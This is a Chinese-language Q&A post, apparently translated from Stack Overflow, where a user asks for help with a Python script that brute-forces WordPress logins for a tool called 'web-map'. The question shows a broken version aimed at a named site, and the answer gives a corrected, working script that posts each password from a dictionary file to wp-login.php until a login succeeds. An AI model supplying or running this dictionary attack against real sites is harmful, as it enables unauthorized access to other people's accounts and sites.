如何用python用請求登錄wordpress？

Question

我一直在做一個叫做web-map的程序。 它掃描網站的漏洞。 但我在暴力強制wordpress登錄時遇到了一些麻煩。 這是代碼蠻力強行登陸：

def brute_login(tgt, dictionary): 
s = requests.Session() 
pass_found = False 

user = raw_input("User: ") 
intent = 0 
tgt = tgt+"/wp-login" 
f = open(dictionary, 'r') 
for word in f.readlines(): 
    password = word.strip('\n') 
    intent+=1 
    payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'} 
    print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent) 
    s.post(tgt, data=payload) 
    data = s.get("http://gerion.info/wp-admin").text 
    if 'Escritorio' in data or 'Desktop' in data: 
     print '[*] Password found: '+password 
     pass_found = True 
    else: 
     pass 

我希望你能幫助我，謝謝！

Answer 1

好吧，我找到了解決方案。 @payne問題是我無法驗證WordPress的管理頁面。 解決方案是讓wordpress通過他自己的cookies設置。 這是最後的代碼：

def brute_login(tgt, dictionary): 

s = requests.Session() 

s.get(tgt) 

user = raw_input("User: ") 
intent = 0 
tgt = tgt + "/wp-login.php" 

passwords = [] 
with open(dictionary, 'r') as f: 
    passwords = f.read().rsplit('\n') 

for password in passwords: 
    intent += 1 
    payload = {'log': user,'pwd': password} 
    print'[+] Trying with user: %s and password: %s\ttry: %s' % (user, password, intent) 

    data = s.post(tgt, data=payload) 


    if not 'ERROR' in data.text: 
     print '[*] Password found: '+password 
     exit(0)